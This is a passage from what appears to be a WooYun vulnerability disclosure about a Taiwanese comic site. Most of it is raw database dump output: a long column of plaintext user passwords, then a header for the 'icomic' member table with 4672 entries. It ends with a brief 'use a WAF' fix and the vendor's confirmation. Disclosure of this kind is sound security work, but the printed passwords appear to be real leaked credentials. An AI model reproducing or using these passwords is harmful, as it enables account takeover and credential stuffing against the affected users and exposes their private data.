| number1 |
| ok916371 |
| ORCHID |
| orrisdrive |
| os0119 |
| OSCAR1002 |
| oym12345 |
| ozaki123 |
| p09220618 |
| P100634009 |
| p221367292 |
| p2f3rak739 |
| p930105 |
| pan123456 |
| PDIKC10003 |
| PEOPL48439 |
| pg226688 |
| phil999 |
| piggy0616 |
| PNFHX76536 |
| pp651106 |
| pq90426 |
| psting0101 |
| q123edsaq |
| q220606746 |
| q2614086 |
| q26766 |
| q41147 |
| QAZWSX20116 |
| qazwsxedcrfv |
| QQ150699 |
| qwe123 |
| r02469 |
| r203030 |
| r57406798 |
| r73637 |
| rachel |
| rll180 |
| robert |
| rosawang |
| roserose12 |
| s168 |
| s224012359 |
| s313323 |
| s3263 |
| s3j7k8 |
| s4572495 |
| s520517 |
| sakura |
| sean0920 |
| shit |
| show940529 |
| shufenwang58 |
| SHULS76264 |
| silencer |
| six2578 |
| slgc64-95 |
| smile0939180246 |
| Solin0429 |
| ss4768890 |
| stella1 |
| su700926 |
| sug120 |
| sun123 |
| sva1010 |
| sweat |
| swj1520 |
| sww0508 |
| syy2119 |
| syyiso12345 |
| szwu6342 |
| td2500 |
| td3555 |
| tea543hkk |
| tearopa |
| Temp1347 |
| tina0920808510 |
| tina4829 |
| TJECO15505 |
| tomjeff |
| tommy0204 |
| touru2468 |
| tr052646 |
| tree168 |
| tsai5575 |
| tsengbbs |
| tt8513tt |
| ufpa2200 |
| ut7168ut |
| uta8893389 |
| v2205 |
| vh0729 |
| viviking |
| w1a1h1l1i1k1 |
| w23930618 |
| w515899 |
| w5712877 |
| wanchen1215 |
| way520117 |
| wd090413 |
| whitney45 |
| wien0712 |
| wil0627 |
| win77wer |
| windows98 |
| wo3997 |
| WORD0928 |
| wv8786 |
| wyl98549 |
| x85939 |
| XAUQJ37957 |
| xx579685 |
| xx6859 |
| xxxx5768 |
| y541009 |
| y6u7i8o9 |
| ya3846ng |
| yahoo9012 |
| yashen37 |
| ycc371311!@# |
| ycm306755 |
| ygmwin324 |
| yi7689 |
| youctb1015 |
| ys1978895 |
| yun!5599 |
| yunshiu |
| yycj76 |
| yz1921 |
| zaq1xsw2 |
| zd1458 |
| ZTWDZ46962 |
| zxc164211 |
| zxcvbnm123 |
| 一書贈送親朋好友,而親朋好友們在閱讀此\xe6\x9b |
| ,這是我購買的主要原因。目前的我沒有三\xe9\xab |
+-----------------------------+
Database: icomic
Table: member
[4672 entries]
+--------------------+
| passwd |
+--------------------+
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
|
修复方案:
上WAF。
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:18
确认时间:2015-12-10 01:47
厂商回复:
感謝通報
最新状态:
暂无